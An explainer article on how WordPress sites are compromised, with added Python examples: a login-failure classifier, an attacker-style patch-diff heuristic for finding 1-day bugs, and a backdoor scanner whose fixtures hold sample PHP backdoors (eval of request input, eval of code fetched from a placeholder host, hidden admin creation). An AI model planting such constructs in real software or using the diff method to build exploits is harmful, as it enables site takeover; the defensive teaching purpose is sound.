How do WordPress sites actually get hacked?

Attacks against websites are overwhelmingly automated. These bots don’t care how big or small your website is—they scan the entire internet for known weaknesses and exploit them at scale.

For cybercriminals seeking money or reach, every hacked site adds to the profit, and the economics work precisely because thousands of sites are compromised in a single sweep.

1. Compromised privileged accounts

The most common way hackers breach WordPress sites is through privileged accounts, above all administrator accounts. An administrator can install arbitrary plugins and edit theme files from the dashboard, so once in, the attacker simply uploads a malicious plugin or a PHP backdoor; no exploit is needed.

Here are the most typical methods:

Session hijacking

Session cookies let you stay logged in without re-entering credentials. If one is stolen, most often by info-stealer malware on the administrator's own device, the attacker replays it and lands in an already-authenticated session: the login form, and any multi-factor prompt attached to it, is never shown.

Stolen cookies are traded on marketplaces at a premium, especially when they come bundled with the rest of a compromised device's logins.

A stolen cookie stays valid until the session expires or is destroyed. WordPress keeps a session for two days by default and fourteen with "Remember Me", so a suspected device compromise calls for rotating the password and destroying every session for that user, not merely logging out on the infected machine.

Leaked credentials

Many users reuse the same password across services. Once one site is breached and its user database leaks, attackers take the email and password pairs, often stored in plaintext or cracked from weak hashes, and try them everywhere else, WordPress logins included. This is credential stuffing, and the dumps that feed it are a goldmine for hackers.

Brute force attacks

Automated bots guess login credentials using massive wordlists, often built from previously leaked passwords. A single source firing thousands of POST requests at wp-login.php or xmlrpc.php is loud and easy to rate-limit, so attackers spread the attempts across a botnet: each IP stays below any per-IP threshold, and only the aggregate against a given account reveals the attack.
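To make the distinction concrete, here is an added example (not code from the article or from Patchstack) that classifies login failures into the patterns described under "Leaked credentials" and "Brute force attacks": single-source brute force, botnet-distributed brute force that stays under per-IP limits, and credential stuffing with leaked email/password pairs. The log format is an assumption, one line per attempt as a hypothetical auth-logging hook might write it, and the sample lines are constructed:

```python
"""Classify failed-login patterns from a WordPress authentication log.

Added example (not from the original article). The log format is an
assumption: one line per login attempt, as a hypothetical auth-logging
plugin or a wp_login_failed hook might write it:

    <ISO timestamp> ip=<address> user=<login> result=<ok|fail>
"""
import re
from collections import Counter, defaultdict

LINE_RE = re.compile(
    r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>ok|fail)$"
)


def parse(lines):
    """Yield (ip, user, result) for well-formed lines; silently skip the rest."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield m.group("ip"), m.group("user"), m.group("result")


def analyze(lines, per_ip_threshold=10, per_user_threshold=10, stuffing_min_users=3):
    """Return the IPs and accounts that match each attack pattern."""
    fails_per_ip = Counter()
    fails_per_pair = Counter()          # (user, ip) -> failures
    users_per_ip = defaultdict(set)
    for ip, user, result in parse(lines):
        if result != "fail":
            continue
        fails_per_ip[ip] += 1
        fails_per_pair[(user, ip)] += 1
        users_per_ip[ip].add(user)

    # 1. Classic brute force: one source alone crosses the per-IP threshold.
    brute = sorted(ip for ip, n in fails_per_ip.items() if n >= per_ip_threshold)
    noisy = set(brute)

    # 2. Botnet brute force: each source stays under the per-IP threshold, so
    #    per-IP rate limiting never fires, but the failures against one account
    #    summed over those quiet sources cross the per-account threshold.
    quiet_fails = Counter()
    quiet_ips = defaultdict(set)
    for (user, ip), n in fails_per_pair.items():
        if ip not in noisy:
            quiet_fails[user] += n
            quiet_ips[user].add(ip)
    distributed = sorted(
        (user, len(quiet_ips[user]))
        for user, n in quiet_fails.items()
        if n >= per_user_threshold and len(quiet_ips[user]) >= 2
    )

    # 3. Credential stuffing: leaked email/password pairs are tried once or
    #    twice each, so a source touches many accounts with few failures apiece.
    stuffing = sorted(
        ip for ip, users in users_per_ip.items()
        if len(users) >= stuffing_min_users
        and all(fails_per_pair[(u, ip)] <= 2 for u in users)
    )
    return {"brute_force": brute, "distributed": distributed, "stuffing": stuffing}


def constructed_sample():
    """Constructed log lines exercising all three patterns plus benign noise."""
    lines = []
    for i in range(12):                        # one IP, 12 failures on "admin"
        lines.append(f"2024-05-10T10:00:{i:02d}Z ip=203.0.113.7 user=admin result=fail")
    for i in range(1, 16):                     # 15 IPs, one failure each on "editor"
        lines.append(f"2024-05-10T10:05:{i:02d}Z ip=198.51.100.{i} user=editor result=fail")
    for i in range(12):                        # 12 leaked pairs, spread over 3 IPs
        lines.append(f"2024-05-10T10:10:{i:02d}Z ip=192.0.2.{i % 3 + 1} "
                     f"user=user{i}@example.com result=fail")
    lines.append("2024-05-10T10:20:00Z ip=203.0.113.50 user=alice result=fail")  # a typo
    lines.append("2024-05-10T10:20:05Z ip=203.0.113.50 user=alice result=ok")
    lines.append("this line is malformed and must be ignored")
    return lines


if __name__ == "__main__":
    for kind, hits in analyze(constructed_sample()).items():
        print(f"{kind}: {hits}")
```

The point of the second rule is the one the text makes: per-IP lockout plugins see fifteen sources with one failure each and do nothing, while counting per account catches the campaign. Thresholds are deliberately low for the sample; on a real site they should be tuned against a baseline of normal typo rates.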

Phishing

Fake login pages that mimic the WordPress login screen trick admins into entering their credentials. These phishing campaigns are often hosted on already compromised sites and can be very convincing, especially behind lookalike domain names.

👉 Remember: Administrator accounts aren’t the only danger zone. Hosting, FTP/SFTP, and even remote management tools can become vectors.

2. Software vulnerabilities

The WordPress core is considered very secure. But your site likely runs a mix of plugins and themes from various developers, and that’s where things get messy.

There are over 60,000 plugins and themes in the WordPress repository, and tens of thousands more in premium marketplaces like Envato or Monsterone. Many of these are developed by individuals or small teams with varying levels of experience, and little to no code review.

Vulnerabilities in core vs plugins

While rare, the WordPress core has had serious vulnerabilities, such as the unauthenticated REST API content injection flaw fixed in WordPress 4.7.2 in early 2017, which was exploited for mass defacements within days of disclosure.

However, plugin and theme vulnerabilities are far more frequent and widely exploited.

Since the launch of bug bounty programs like Patchstack’s in 2020, the number of discovered plugin vulnerabilities has skyrocketed—from 582 in 2020 to over 4500 in 2022 alone.


Automated bots now monitor the public plugin repository for changes that indicate a security fix (every release is a commit to plugins.svn.wordpress.org, so a version-to-version diff is trivial to obtain) and launch attacks against sites that have not updated within hours.

Zero-day vs 1-day vulnerabilities

  • Zero-day: a vulnerability exploited, or at least known to attackers, before a fix exists, so there is nothing to update to.
  • 1-day (also called n-day): a vulnerability for which a fix has been released and details are public, exploited against sites that have not yet applied the update.

Most real-world attacks target 1-day vulnerabilities: the patch itself tells attackers where the bug is, the window between a release and mass exploitation is now hours, and many sites take weeks to update.

Updating alone is not enough. Many affected plugins are abandoned and never receive a patch at all; for those the only fix is to remove or replace them, which means a site owner needs some way of knowing which installed plugins have a published but unpatched vulnerability.
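The following added example (not from the article or from any real plugin) shows what that patch-watching looks like from the attacker's side: diff two constructed versions of a plugin's AJAX handler and infer, from the security calls the fix introduced, which bug class the old version had and therefore what the 1-day exploit is. The WordPress function names are real; the plugin code and the indicator table are assumptions for illustration:

```python
"""Heuristic a patch-watching bot might use: diff two versions of a plugin
file and infer from the fix what bug it closed. Added example; the two
versions below are constructed for illustration, not taken from any real plugin.
"""
import difflib
import re

BEFORE = """\
<?php
add_action( 'wp_ajax_nopriv_acme_export', 'acme_export' );
function acme_export() {
    global $wpdb;
    $id  = $_GET['id'];
    $row = $wpdb->get_row( "SELECT * FROM {$wpdb->prefix}acme WHERE id = $id" );
    echo $row->payload;
    wp_die();
}
"""

AFTER = """\
<?php
add_action( 'wp_ajax_acme_export', 'acme_export' );
function acme_export() {
    global $wpdb;
    check_ajax_referer( 'acme_export' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Forbidden', 403 );
    }
    $id  = absint( $_GET['id'] );
    $row = $wpdb->get_row( $wpdb->prepare( "SELECT * FROM {$wpdb->prefix}acme WHERE id = %d", $id ) );
    echo esc_html( $row->payload );
    wp_die();
}
"""

# Calls whose *addition* in a patch betrays the class of bug that was there before.
ADDED_LINE_INDICATORS = [
    (re.compile(r"\bcurrent_user_can\s*\("), "missing capability check (privilege escalation)"),
    (re.compile(r"\b(check_ajax_referer|check_admin_referer|wp_verify_nonce)\s*\("), "missing nonce (CSRF)"),
    (re.compile(r"\$wpdb->prepare\s*\("), "unprepared SQL (SQL injection)"),
    (re.compile(r"\b(esc_html|esc_attr|esc_url|esc_js|wp_kses_post)\s*\("), "unescaped output (XSS)"),
    (re.compile(r"\b(absint|intval|sanitize_text_field|sanitize_file_name)\s*\("), "unsanitized input"),
]
# A removed wp_ajax_nopriv_ hook means the endpoint used to be reachable without logging in.
REMOVED_LINE_INDICATORS = [
    (re.compile(r"wp_ajax_nopriv_"), "unauthenticated hook removed (auth bypass)"),
]


def security_indicators(before, after):
    """Return the sorted, de-duplicated bug classes the patch hints at."""
    found = set()
    for line in difflib.unified_diff(before.splitlines(), after.splitlines(), lineterm="", n=0):
        if line.startswith(("+++", "---", "@@")):
            continue                      # unified-diff headers, not content
        if line.startswith("+"):
            table = ADDED_LINE_INDICATORS
        elif line.startswith("-"):
            table = REMOVED_LINE_INDICATORS
        else:
            continue
        for pattern, label in table:
            if pattern.search(line[1:]):
                found.add(label)
    return sorted(found)


if __name__ == "__main__":
    for label in security_indicators(BEFORE, AFTER):
        print("patch suggests:", label)
```

A changelog that says "security fix" is not needed: the diff alone names the endpoint, shows it was previously reachable without login, and shows the unprepared query, which is enough to write the exploit for every site still on the old version.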


3. Malicious plugins and social engineering

Sometimes, the plugins themselves are the attack.

Nulled plugins and themes

Pirated “premium” plugins are intentionally distributed with embedded malware. They work as advertised—until you realize they’ve opened backdoors into your site. This tactic exploits people’s desire to save money and “get something for free.”

One such operation, WP-VCD, was notorious for spreading these backdoored plugins at scale.

Plugins with built-in backdoors

Some developers build backdoor access into their plugins, out of malice or simply for convenience. 🤷🏻 It tends to happen when a plugin changes hands, or when the original author adds a remote-support feature (a hidden login, an update hook that runs fetched code) that hackers can use just as easily as the author.
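As an added example (not the article's or Patchstack's code), here is a small scanner for the constructs that nulled and backdoored plugins tend to contain: eval of decoded or remotely fetched code, an administrator account created on init, and a plugin hiding itself from the plugin list through the all_plugins filter. The file contents are constructed stand-ins, not real malware, and the rules are heuristics, which is why the benign base64 user in the sample is deliberately left unflagged:

```python
"""Scan plugin and theme source for the tell-tale constructs of a backdoor.
Added example (not the article's own code). File contents below are
constructed stand-ins, not real malware; the rules are heuristics and every
hit needs a human look, since legitimate code also uses base64_decode().
"""
import os
import re

CONSTRUCTED_FILES = {
    # Nulled "premium" plugin: eval of attacker-supplied code, hidden from the plugin list.
    "wp-content/plugins/nulled-slider/init.php": """<?php
$k = $_REQUEST['k'];
@eval( base64_decode( $k ) );
add_filter( 'all_plugins', function ( $p ) { unset( $p['nulled-slider/init.php'] ); return $p; } );
""",
    # Same plugin phoning home for code to run.
    "wp-content/plugins/nulled-slider/update.php": """<?php
$code = wp_remote_retrieve_body( wp_remote_get( 'http://example.invalid/u.txt' ) );
eval( $code );
""",
    # Theme that quietly creates a hidden administrator.
    "wp-content/themes/acme/functions.php": """<?php
function acme_setup() {
    if ( ! username_exists( 'wp_support' ) ) {
        $uid = wp_create_user( 'wp_support', 'P@ssw0rd', 'x@example.invalid' );
        $u = new WP_User( $uid );
        $u->set_role( 'administrator' );
    }
}
add_action( 'init', 'acme_setup' );
""",
    # Benign: base64 is used, but nothing is executed.
    "wp-content/plugins/acme-cache/cache.php": """<?php
$png = base64_decode( 'iVBORw0KGgo=' );
file_put_contents( $file, $png );
""",
}

# Each rule fires only when *all* its patterns occur in the same file.
RULES = [
    ("eval_of_decoded", [r"\beval\s*\(\s*@?(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("]),
    ("eval_with_user_input", [r"\beval\s*\(", r"\$_(GET|POST|REQUEST|COOKIE)\b"]),
    ("remote_code_loader", [r"\beval\s*\(", r"\b(wp_remote_get|file_get_contents|curl_exec)\s*\("]),
    ("creates_admin_user", [
        r"\b(wp_create_user|wp_insert_user)\s*\(",
        r"set_role\s*\(\s*['\"]administrator['\"]|['\"]role['\"]\s*=>\s*['\"]administrator['\"]",
    ]),
    ("hides_from_plugin_list", [r"add_filter\s*\(\s*['\"]all_plugins['\"]"]),
    ("dynamic_function_creation", [r"\b(create_function|assert)\s*\(\s*\$"]),
]
COMPILED = [(name, [re.compile(p) for p in pats]) for name, pats in RULES]


def scan(files):
    """files: {path: source}. Return {path: [rule names]} for files with hits only."""
    report = {}
    for path, src in files.items():
        hits = sorted(name for name, pats in COMPILED if all(p.search(src) for p in pats))
        if hits:
            report[path] = hits
    return report


def scan_directory(root):
    """Read every .php file under root (for example wp-content) and scan it."""
    files = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    files[path] = fh.read()
    return scan(files)


if __name__ == "__main__":
    for path, hits in scan(CONSTRUCTED_FILES).items():
        print(path, "->", ", ".join(hits))
```

Run scan_directory() against a copy of wp-content taken from the nulled download before it is installed; a hit on eval_with_user_input or remote_code_loader is the "free" plugin's real price. Keep the rule set small and explainable rather than chasing every obfuscation trick, since a scanner that cries wolf on every base64_decode() is quickly ignored.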

Scams that exploit fear

Hackers also impersonate trusted sources—like the WordPress core team—claiming a critical flaw needs to be patched with a special plugin.

Unsuspecting users install malware thinking they’re protecting their site.



Final thoughts: most hacks start with a click or a missed update

Most compromises trace back to basic decisions, whether it’s weak passwords, outdated plugins, or a free download that was too good to be true. And unfortunately, there’s no firewall for human error.

Stick to trusted software sources, support the developers who maintain secure code, and stay vigilant with updates and monitoring. That’s how you turn your WordPress site from low-hanging fruit into a hard target.
